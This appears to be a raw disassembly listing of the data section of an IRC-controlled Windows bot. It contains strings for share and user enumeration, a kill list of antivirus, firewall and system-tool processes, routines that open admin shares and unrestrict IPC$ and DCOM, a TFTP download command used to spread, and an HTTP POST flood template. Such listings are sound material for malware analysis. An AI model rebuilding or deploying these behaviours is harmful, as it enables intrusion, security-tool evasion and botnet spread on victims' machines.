aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_41BD5A:loc_41BDE9�o
align 10h
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_41BD5A+85�o
align 4
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_41BD5A:loc_41BDC3�o
align 10h
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_41BD5A:loc_41BDB9�o
align 10h
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_41BD5A:loc_41BDAF�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_41BD5A:loc_41BDA5�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_41BD5A:loc_41BD9B�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_41BD5A+37�o
align 4
; char asc_438718[]
asc_438718 db '-' ; DATA XREF: sub_41BE8A+A4�o
db 3, 34h, 2
dd 274656Eh, 25202D03h, 34032073h, 76726553h, 3A037265h
dd 20532520h, 654D3403h, 67617373h, 203A0365h, 5325h
; char asc_438744[]
asc_438744 db '-' ; DATA XREF: sub_41BE8A+7C�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aMessageSentSuc db '- message sent successfully',0
align 4
; char asc_43876C[]
asc_43876C db '-' ; DATA XREF: sub_41BF46+65�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoServiceSpec db '- %s: no service specified',0
unk_438790 db 2Dh ; - ; DATA XREF: sub_41BF46+4F�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aErrorWithServi db '- error with service: ',27h,'%s',27h,' - %s',0
align 4
; char asc_4387BC[]
asc_4387BC db '-' ; DATA XREF: sub_41BF46+33�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSServiceS db '- %s service: ',27h,'%s',27h,0
; char asc_4387D8[]
asc_4387D8 db '-' ; DATA XREF: sub_41BFBE+AA�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoShareSpecif db '- %s: no share specified',0
align 4
; char asc_4387FC[]
asc_4387FC db '-' ; DATA XREF: sub_41BFBE+88�o
db 3, 34h, 2
dd 274656Eh, 25202D03h, 68732073h, 3A657261h, 73252720h
dd 27h
; char asc_438818[]
asc_438818 db '-' ; DATA XREF: sub_41BFBE+56�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithShar db '- %s: error with share: ',27h,'%s',27h,' - %s',0
align 4
; char a14s24s6u4s[]
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_41C07C+CE�o
align 4
aNo db 'No',0 ; DATA XREF: sub_41C07C+BA�o
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_41C07C+B3�o
; char asc_438864[]
asc_438864 db '-' ; DATA XREF: sub_41C07C+74�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListError db '- share list error %s <%ld>',0
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_41C07C+1D�o
align 4
; char asc_4388C4[]
asc_4388C4 db '-' ; DATA XREF: sub_41C19B+B5�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoUsernameSpe db '- %s: no username specified',0
align 4
; char asc_4388EC[]
asc_4388EC db '-' ; DATA XREF: sub_41C19B+93�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithUser db '- %s: error with username: ',27h,'%s',27h,' - %s',0
align 4
; char asc_43891C[]
asc_43891C db '-' ; DATA XREF: sub_41C19B+6D�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSUsernameS db '- %s username: ',27h,'%s',27h,0
align 4
; char aTotalUsersFoun[]
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_41C265+144�o
align 4
; char asc_438954[]
asc_438954 db '-' ; DATA XREF: sub_41C265:loc_41C350�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aAnAccessViolat db '- an access violation has occured',0
align 10h
; char aS_5[]
aS_5 db ' %S',0 ; DATA XREF: sub_41C265+B8�o
align 4
; char asc_438988[]
asc_438988 db '-' ; DATA XREF: sub_41C265+78�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListErrorS db '- user list error %s <%ld>',0
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_41C265+1F�o
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: .data:004434B4�o
align 10h
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:004434B0�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:004434AC�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:004434A8�o
align 4
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:004434A4�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:004434A0�o
align 10h
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:0044349C�o
align 4
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:00443498�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:00443494�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:00443490�o
aTeekids_exe db 'teekids.exe',0 ; DATA XREF: .data:0044348C�o
aMsblast_exe db 'MSBLAST.exe',0 ; DATA XREF: .data:00443488�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:00443484�o
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:00443480�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:0044347C�o
align 4
aWincfg32_exeta db 'wincfg32.exetaskmon.exe',0 ; DATA XREF: .data:00443478�o
aZonealarm_exe db 'zonealarm.exe',0 ; DATA XREF: .data:00443474�o
align 10h
aNavapw32_exe db 'navapw32.exe',0 ; DATA XREF: .data:00443470�o
align 10h
aNavw32_exe db 'navw32.exe',0 ; DATA XREF: .data:0044346C�o
align 4
aZapro_exe db 'zapro.exe',0 ; DATA XREF: .data:00443468�o
align 4
aMsblast_exe_0 db 'msblast.exe',0 ; DATA XREF: .data:00443464�o
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: .data:00443460�o
aMsconfig_exe db 'msconfig.exe',0 ; DATA XREF: .data:0044345C�o
align 10h
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: .data:off_443458�o
; char aSD_0[]
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_41C444+183�o
align 4
; char asc_438B28[]
asc_438B28 db '-' ; DATA XREF: sub_41C66C:loc_41C6EC�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListFai db ' process list failed',0
align 4
unk_438B4C db 2Dh ; - ; DATA XREF: sub_41C66C+79�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListCom db ' process list complete',0
align 10h
; char asc_438B70[]
asc_438B70 db '-' ; DATA XREF: sub_41C66C+2A�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aListingProcess db ' listing processes:',0
; char aPrivmsgSS_1[]
aPrivmsgSS_1 db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_41C7F5+33�o
unk_438BA0 db 2Dh ; - ; DATA XREF: sub_41C87C:loc_41C9AC�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotReadDa db '- Could not read data from proccess.',0Dh,0Ah,0
unk_438BD0 db 2Dh ; - ; DATA XREF: sub_41C87C+129�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aProccessHasTer db '- Proccess has terminated.',0Dh,0Ah,0
align 4
unk_438BF8 db 2Dh ; - ; DATA XREF: sub_41C87C+F7�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotRead_0 db '- Could not read data from proccess',0Dh,0Ah,0
align 4
; char asc_438C28[]
asc_438C28 db '-' ; DATA XREF: sub_41C9D4+198�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aFailedToStartI db '- Failed to start IO thread, error: <%d>.',0
align 4
; char dword_438C5C[]
dword_438C5C dd 234032Dh, 2646D63h, 52202D03h, 746F6D65h, 6F432065h
; DATA XREF: sub_41C9D4+150�o
dd 6E616D6Dh, 72502064h, 74706D6Fh, 0
dword_438C80 dd 5C3A44h, 2444h, 5C3A43h, 2443h, 494D4441h, 244Eh
; DATA XREF: .data:004434D4�o
; .data:004434D0�o ...
aIpc db 'IPC$',0 ; DATA XREF: .data:off_4434B8�o
align 10h
; char asc_438CA0[]
asc_438CA0 db '-' ; DATA XREF: sub_41CB8D+2E3�o
; sub_41CEAF+2D5�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetapi32_dllCo db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 10h
; char asc_438CD0[]
asc_438CD0 db '-' ; DATA XREF: sub_41CB8D+2CD�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetworkSharesD db '- Network shares deleted.',0
align 4
; char asc_438CF8[]
asc_438CF8 db '-' ; DATA XREF: sub_41CB8D:loc_41CDF3�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToDelete db '- Failed to delete ',27h,'%S',27h,' share.',0
align 4
dword_438D24 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41CB8D+25F�o
aShareSDeleted_ db '- Share ',27h,'%S',27h,' deleted.',0
align 4
; char asc_438D48[]
asc_438D48 db '-' ; DATA XREF: sub_41CB8D:loc_41CD63�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToDele_0 db '- Failed to delete ',27h,'%s',27h,' share.',0
align 4
dword_438D74 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41CB8D+1CF�o
aShareSDelete_0 db '- Share ',27h,'%s',27h,' deleted.',0
align 4
; char asc_438D98[]
asc_438D98 db '-' ; DATA XREF: sub_41CB8D:loc_41CCBB�o
; sub_41CEAF:loc_41CFD9�o
db 3, 34h, 2
dd 75636573h, 3026572h
aAdvapi32_dllCo db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 4
dword_438DC8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41CB8D:loc_41CCB4�o
aFailedToOpenIp db '- Failed to open IPC$ Restriction registry key.',0
; char asc_438E04[]
asc_438E04 db '-' ; DATA XREF: sub_41CB8D:loc_41CC9C�o
db 3, 34h, 2
dd 75636573h, 3026572h
aRestrictedAcce db '- Restricted access to the IPC$ Share.',0
align 4
dword_438E38 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41CB8D+108�o
aFailedToRestri db '- Failed to restrict access to the IPC$ Share.',0
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_41CB8D+E9�o
; sub_41CEAF+E9�o
align 4
; char asc_438E88[]
asc_438E88 db '-' ; DATA XREF: sub_41CB8D+8D�o
; sub_41CEAF+8D�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToOpenDc db '- Failed to open DCOM registry key.',0
; char asc_438EB8[]
asc_438EB8 db '-' ; DATA XREF: sub_41CB8D:loc_41CBFC�o
db 3, 34h, 2
dd 75636573h, 3026572h, 4344202Dh, 64204D4Fh, 62617369h
dd 2E64656Ch, 0
dword_438ED8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41CB8D+68�o
aDisableDcomFai db '- Disable DCOM failed.',0
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_41CB8D+50�o
; sub_41CEAF+50�o
align 4
; char asc_438F08[]
asc_438F08 db '-' ; DATA XREF: sub_41CEAF+2BD�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetworkSharesA db '- Network shares added.',0
; char aC_0[]
aC_0 db '%c:\',0 ; DATA XREF: sub_41CEAF+227�o
align 4
; char aC_1[]
aC_1 db '%c$',0 ; DATA XREF: sub_41CEAF+216�o
; char asc_438F38[]
asc_438F38 db '-' ; DATA XREF: sub_41CEAF:loc_41D058�o
; sub_41CEAF:loc_41D11F�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToAddSSh db '- Failed to add ',27h,'%s',27h,' share.',0
dword_438F60 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41CEAF+1A2�o
; sub_41CEAF+269�o
aShareSAdded_ db '- Share ',27h,'%s',27h,' added.',0
dword_438F80 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41CEAF:loc_41CFD2�o
aFailedToOpen_0 db '- Failed to open IPC$ restriction registry key.',0
; char asc_438FBC[]
asc_438FBC db '-' ; DATA XREF: sub_41CEAF:loc_41CFBA�o
db 3, 34h, 2
dd 75636573h, 3026572h
aUnrestrictedAc db '- Unrestricted access to the IPC$ Share.',0
align 4
dword_438FF4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41CEAF+104�o
aFailedToUnrest db '- Failed to unrestrict access to the IPC$ Share.',0
align 4
; char asc_439034[]
asc_439034 db '-' ; DATA XREF: sub_41CEAF:loc_41CF1E�o
db 3, 34h, 2
dd 75636573h, 3026572h, 4344202Dh, 65204D4Fh, 6C62616Eh
dd 2E6465h
dword_439050 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41CEAF+68�o
aEnableDcomFail db '- Enable DCOM failed.',0
align 4
flt_439074 dd 9.765625e-4 ; DATA XREF: sub_41D235+1B9�r
flt_439078 dd 8.0 ; DATA XREF: sub_41D235+1B3�r
flt_43907C dd 0.0 ; DATA XREF: sub_41D235+170�r
flt_439080 dd 1.0e-3 ; DATA XREF: sub_41D235:loc_41D39C�r
flt_439084 dd 4.2949673e9 ; DATA XREF: sub_41D235+161�r
; sub_41D235+1AA�r
; char aPostHttp1_0Hos[]
aPostHttp1_0Hos db 'POST / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41D235+D5�o
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
; char asc_4390C0[]
asc_4390C0 db '-' ; DATA XREF: sub_41D41B+1A7�o
db 3, 34h, 2
dd 65657073h, 73657464h, 2D030274h, 75450220h, 65706F72h
dd 25203A02h, 626B2064h, 732F7469h, 53550220h, 203A0241h
dd 6B206425h, 2F746962h, 41022073h, 2616973h, 6425203Ah
dd 69626B20h, 20732F74h, 65764102h, 65676172h, 25203A02h
dd 626B2064h, 732F7469h, 0
aWww_google_co_ db 'www.google.co.jp',0 ; DATA XREF: sub_41D41B+C4�o
align 4
aYahoo_co_jp db 'yahoo.co.jp',0 ; DATA XREF: sub_41D41B+BD�o
aWww_nifty_com db 'www.nifty.com',0 ; DATA XREF: sub_41D41B+B6�o
align 10h
aWww_d1asia_com db 'www.d1asia.com',0 ; DATA XREF: sub_41D41B+AF�o
align 10h
aWww_st_lib_kei db 'www.st.lib.keio.ac.jp',0 ; DATA XREF: sub_41D41B+A8�o
align 4
aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_41D41B+A1�o
aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_41D41B+9A�o
align 4
aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_41D41B+93�o
align 10h
aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_41D41B+8C�o
align 10h
aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_41D41B+85�o
align 10h
aNitro_ucsc_edu db 'nitro.ucsc.edu',0 ; DATA XREF: sub_41D41B+7E�o
align 10h
aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_41D41B+77�o
align 10h
aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_41D41B+70�o
align 4
aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_41D41B+69�o
aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_41D41B+62�o
aWww_verio_com db 'www.verio.com',0 ; DATA XREF: sub_41D41B+5B�o
align 10h
aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_41D41B+54�o
align 4
aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_41D41B+4D�o
align 10h
aWww_google_it db 'www.google.it',0 ; DATA XREF: sub_41D41B+46�o
align 10h
aDe_yahoo_com db 'de.yahoo.com',0 ; DATA XREF: sub_41D41B+3F�o
align 10h
aWww_belwue_de db 'www.belwue.de',0 ; DATA XREF: sub_41D41B+38�o
align 10h
aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_41D41B+31�o
align 10h
aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_41D41B+2A�o
align 10h
aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_41D41B+23�o
align 4
aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_41D41B+1C�o
align 4
aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_41D41B+15�o
; char aDdDhDm[]
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_41D5F8+39�o
; char asc_4392D8[]
asc_4392D8 db '-' ; DATA XREF: sub_41D779+24C�o
db 3, 34h, 2
dd 69737973h, 26F666Eh, 2202D03h, 2555043h, 4925203Ah
dd 4D753436h, 202E7A48h, 4D415202h, 25203A02h, 20424B73h
dd 61746F74h, 25202C6Ch, 20424B73h, 65657266h, 4402202Eh
dd 26B7369h, 7325203Ah, 746F7420h, 202C6C61h, 66207325h
dd 2E656572h, 534F0220h, 57203A02h, 6F646E69h, 25207377h
dd 25282073h, 64252E64h, 7542202Ch, 20646C69h, 2E296425h
dd 79530220h, 72696473h, 25203A02h, 2202E73h, 74736F48h
dd 656D616Eh, 25203A02h, 25282073h, 202E2973h, 72754302h
dd 746E6572h, 65735520h, 203A0272h, 202E7325h, 74614402h
dd 203A0265h, 202E7325h, 6D695402h, 203A0265h, 202E7325h
dd 74705502h, 2656D69h, 7325203Ah, 2Eh
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_41D779+161�o
; char aCouldnTResolve[]
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_41D779:loc_41D8AC�o
align 4
; char aSS_5[]
aSS_5 db '%s (%s)',0 ; DATA XREF: sub_41D779+C0�o
; char asc_4393E0[]
asc_4393E0 db '-' ; DATA XREF: sub_41D9E5+9E�o
db 3, 34h, 2
dd 6974656Eh, 26F666Eh, 2202D03h, 65707954h, 25203A02h
dd 25282073h, 202E2973h, 20504902h, 72646441h, 2737365h
dd 7325203Ah, 4802202Eh, 6E74736Fh, 2656D61h, 7325203Ah
dd 2Eh
; char off_439424[]
off_439424 dd offset loc_412F4C+2 ; DATA XREF: sub_41D9E5:loc_41DA52�o
off_439428 dd offset dword_4E414C ; DATA XREF: sub_41D9E5:loc_41DA4B�o
; char aDialUp[]
aDialUp db 'Dial-up',0 ; DATA XREF: sub_41D9E5+57�o
; char aNotConnected[]
aNotConnected db 'Not connected',0 ; DATA XREF: sub_41D9E5+41�o
align 4
; char asc_439444[]
asc_439444 db '-' ; DATA XREF: sub_41DAA1:loc_41DC4F�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToGetReq db ' Failed to get requested URL from HTTP server.',0
align 10h
dword_439480 dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 73697620h
; DATA XREF: sub_41DAA1+1A7�o
dd 64657469h, 2Eh
unk_43949C db 2Dh ; - ; DATA XREF: sub_41DAA1+191�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToConnec db ' Failed to connect to HTTP server.',0
align 4
unk_4394CC db 2Dh ; - ; DATA XREF: sub_41DAA1+162�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aCouldNotOpenAC db ' Could not open a connection.',0
align 4
; char asc_4394F8[]
asc_4394F8 db '-' ; DATA XREF: sub_41DAA1+BE�o
db 3, 34h, 2
dd 69736976h, 2D030274h, 766E4920h, 64696C61h, 4C525520h
dd 2Eh
dword_439514 dd 2A2F2Ah ; DATA XREF: sub_41DAA1+3D�o
dword_439518 dd 2 dup(0) ; DATA XREF: sub_41DCBE+16�o
dword_439520 dd 2 dup(0) ; DATA XREF: sub_41DCBE+C�o
; .text:0041DE0F�o
aTftpISGetS db 'tftp -i %s GET %s',0 ; DATA XREF: .text:0041DFB8�o
align 4
aC_2 db '%c',0 ; DATA XREF: .text:0041DF37�o
align 10h
dword_439540 dd 0DFFh ; DATA XREF: .text:0041DE24�o
dword_439544 dd 0EBFFh ; DATA XREF: .text:0041DE19�o
dword_439548 dd 201h ; DATA XREF: .text:0041DE04�o
aRfb003_008 db 'RFB 003.008',0Ah,0 ; DATA XREF: .text:0041DDF8�o
align 4
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1�o
align 10h
oword_439580 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: _floor+E3�r
oword_439590 xmmword 4330000000000000433h ; DATA XREF: _floor+46�r
oword_4395A0 xmmword 4330000000000000BFF0000000000000h ; DATA XREF: _floor+10E�r
oword_4395B0 xmmword 80000000000000008000000000000000h ; DATA XREF: _floor:ret_neg_one�r
; _floor+106�r
oword_4395C0 xmmword 7FFh ; DATA XREF: _floor+5F�r
dword_4395D0 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: _CxxThrowException(x,x)+E�o
dd 3, 19930520h, 2 dup(0)
oword_4395F0 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: _ceil+E3�r
; _ceil+10A�r
oword_439600 xmmword 4330000000000000433h ; DATA XREF: _ceil+46�r
oword_439610 xmmword 0 ; DATA XREF: _ceil:ret_one�r
oword_439620 xmmword 7FFh ; DATA XREF: _ceil+5F�r
dbl_439630 db 0, 0, 0, 0, 0, 0, 0, 80h ; DATA XREF: _ceil:ret_zero_0�r
stru_439638 _msEH <0FFFFFFFFh, offset loc_420A5C, offset loc_420A60>
; DATA XREF: __strupr+2�o __output+5E�r
align 8
stru_439648 _msEH <0FFFFFFFFh, offset loc_420EAF, offset loc_420EC3>
; DATA XREF: start+2�o
align 8
byte_439658 db 6 ; DATA XREF: __output:loc_422334�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_4437D0�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_4437CC�o
align 10h
stru_4396D0 _msEH <0FFFFFFFFh, offset sub_422B6F, offset sub_422B73>
; DATA XREF: sub_422B83-2F�o
dd 41h dup(0)
asc_4397E0: ; DATA XREF: .data:off_4437D8�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
db 2 dup(0)
word_4399E2 dw 20h ; DATA XREF: .data:off_4437DC�o
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h, 0
stru_439BE8 _msEH <0FFFFFFFFh, offset loc_423284, offset loc_423288>
; DATA XREF: sub_423257+2�o
align 8
stru_439BF8 _msEH <0FFFFFFFFh, offset loc_4232C8, offset loc_4232CC>
; DATA XREF: sub_42329B+2�o
align 8
stru_439C08 _msEH <0FFFFFFFFh, offset loc_4239CB, offset loc_4239CF>
; DATA XREF: __input+5�o
dd 2 dup(0)
dd 7FF00000h, 0
dd 0FFF00000h, 0
dd 7FE00000h, 0
dd 200000h, 3 dup(0)
dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h, 0FFC00000h
dd 0
dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h, 8DA24260h
dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
aAtan db 'atan',0 ; DATA XREF: ___libm_error_support:loc_4245CA�o
align 4
aCeil db 'ceil',0 ; DATA XREF: ___libm_error_support:loc_4245C1�o
align 10h
aFloor db 'floor',0 ; DATA XREF: ___libm_error_support:loc_4245B8�o
align 4
aModf db 'modf',0 ; DATA XREF: ___libm_error_support+20F�o
align 10h
aExp2 db 'exp2',0 ; DATA XREF: ___libm_error_support:loc_424543�o
align 4
aExp10 db 'exp10',0 ; DATA XREF: ___libm_error_support+1A2�o
align 10h
aLog2 db 'log2',0 ; DATA XREF: ___libm_error_support:loc_424510�o
; ___libm_error_support+192�o
align 4
aPow db 'pow',0 ; DATA XREF: ___libm_error_support:loc_42443B�o
; ___libm_error_support+CF�o ...
aLog10 db 'log10',0 ; DATA XREF: ___libm_error_support:loc_4243FE�o
; ___libm_error_support+7C�o ...
align 4
aExp db 'exp',0 ; DATA XREF: ___libm_error_support+4E�o
; ___libm_error_support+61�o ...
stru_439CC8 _msEH <0FFFFFFFFh, offset loc_42463E, offset loc_424642>
; DATA XREF: _has_osfxsr_set+2�o
; char aAuthenticamd[]
aAuthenticamd db 'AuthenticAMD',0 ; DATA XREF: ___sse2_available_init+73�o
align 8
dbl_439CE8 dq 1.0 ; DATA XREF: __floor_default+6D�r
; __ms_p5_test_fdiv+2A�r ...
dbl_439CF0 dq 0.0 ; DATA XREF: __positive+6�r
; __handle_exc+8D�r ...
; char aE000[]
aE000 db 'e+000',0 ; DATA XREF: __cftoe+93�o
align 10h
dbl_439D00 dq 4.195835e6 ; DATA XREF: __ms_p5_test_fdiv+F�r
dbl_439D08 dq 3.145727e6 ; DATA XREF: __ms_p5_test_fdiv+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: __ms_p5_mp_test_fdiv+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: __ms_p5_mp_test_fdiv�o
align 4
stru_439D38 _msEH <0FFFFFFFFh, 0, offset sub_424D5E>
; DATA XREF: ___FrameUnwindToState+2�o
align 8
dd offset loc_424D24
dd offset loc_424D2D
stru_439D50 _msEH <0FFFFFFFFh, offset sub_424DA8, offset sub_424DB1>
; DATA XREF: ___DestructExceptionObject+2�o
align 10h
stru_439D60 _msEH <0FFFFFFFFh, 0, offset sub_424F16>
; DATA XREF: CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+2�o
align 10h
dd offset loc_424E52
dd offset loc_424EA1
stru_439D78 _msEH <0FFFFFFFFh, offset sub_4250F2, offset sub_4250F6>
; DATA XREF: BuildCatchObject(EHExceptionRecord *,void *,_s_HandlerType const *,_s_CatchableType const *)+2�o
align 8
stru_439D88 _msEH <0FFFFFFFFh, offset loc_4254D2, offset loc_4254D6>
; DATA XREF: sub_4254B5+2�o
align 8
stru_439D98 _msEH <0FFFFFFFFh, offset loc_4254FF, offset loc_425503>
; DATA XREF: sub_4254E2+2�o
dword_439DA4 dd 0 ; DATA XREF: ___crtLCMapStringA+1C�o
; ___crtGetStringTypeA+1E�o ...
stru_439DA8 _msEH <0FFFFFFFFh, offset loc_425E4E, offset loc_425E52>
; DATA XREF: ___crtLCMapStringA+2�o
dd 0FFFFFFFFh, 425C4Bh, 425C4Fh, 0FFFFFFFFh, 425D19h, 425D1Dh
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
